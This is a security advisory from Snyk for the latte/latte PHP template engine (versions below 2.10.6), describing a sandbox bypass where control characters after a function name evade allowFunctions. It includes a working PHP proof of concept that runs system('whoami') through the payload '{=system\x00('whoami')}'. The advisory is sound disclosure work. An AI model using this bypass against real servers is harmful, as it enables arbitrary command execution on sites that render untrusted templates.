Access Control Bypass Affecting latte/latte package, versions <2.10.6


0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.25% (65th percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-PHP-LATTELATTE-1932226
  • published 9 Dec 2021
  • disclosed 26 Nov 2021
  • credit Jiang

How to fix?

Upgrade latte/latte to version 2.10.6 or higher.

Overview

latte/latte is an intuitive and fast template engine for those who want the most secure PHP sites. Introduces context-sensitive escaping.

Affected versions of this package are vulnerable to Access Control Bypass. There is a way to bypass allowFunctions that will affect the security of the application. When the template is set to allow/disallow the use of certain functions, adding control characters (x00-x08) after the function will bypass these restrictions.

PoC

// The following PoC will execute the system function "whoami"
<?php
error_reporting(0);
require 'vendor/autoload.php';
$latte = new Latte\Engine;
$policy = new Latte\Sandbox\SecurityPolicy;
$policy->allowFilters($policy::ALL);
$policy->allowMacros(['if','=']);
$policy->allowFunctions(['strlen']);
$latte->setPolicy($policy);
$latte->setSandboxMode();
$latte->setAutoRefresh(false);
file_put_contents('index.latte',"{=system\x00('whoami')}");
$latte->render('index.latte');